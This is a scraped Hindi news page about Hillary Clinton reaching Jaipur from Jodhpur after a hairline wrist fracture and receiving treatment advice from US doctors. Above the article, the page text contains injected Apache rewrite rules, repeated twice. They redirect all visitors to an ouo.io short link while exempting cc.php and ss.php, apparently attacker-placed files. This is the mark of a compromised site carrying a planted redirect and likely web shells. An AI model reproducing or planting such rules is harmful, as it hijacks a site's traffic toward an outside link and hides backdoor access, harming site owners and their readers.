
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 612
Previous Nextजयपुर। अमेरिका की पूर्व विदेश मंत्री हिलेरी क्लिंटन गुरुवार को सवेरे जयपुर पहुंची। वे जोधपुर से चार्टर प्लेन से जयपुर पहुंची है। यहां कुछ समय रूकने के बाद वे वापस जाएगी। हिलेरी इन दिनों भारत भ्रमण पर है। वे घूमने के लिए जोधपुर आई थी लेकिन वहां मांडू में पैर फिसलने से उनकी कलाई में फ्रैक्चर हो गया। इसके बाद वे कहीं नहीं घूमी औऱ बुधवार को दिन भर उम्मेद पैलेस में आराम किया। अस्पताल में हिलेरी की कलाई का एक्सरे व सीटी स्कैन किया गया। उनकी कलाई में हेयर लाइन फ्रेक्चर पाया गया। हिलेरी के कलाई की रिपोर्ट तुरंत ऑन लाइन अमेरिका भेजी गई। अमेरिका में उनके डॉक्टर ने किसी प्रकार का प्लास्टर कराने से मना कर दिया। वहां के डॉक्टरों ने उन्हें फिलहाल क्रेप बेंड बांध हाथ को आराम देने का कहा है। उनकी कलाई का पूरा इलाज अमेरिका लौटने पर वहीं किया जाएगा।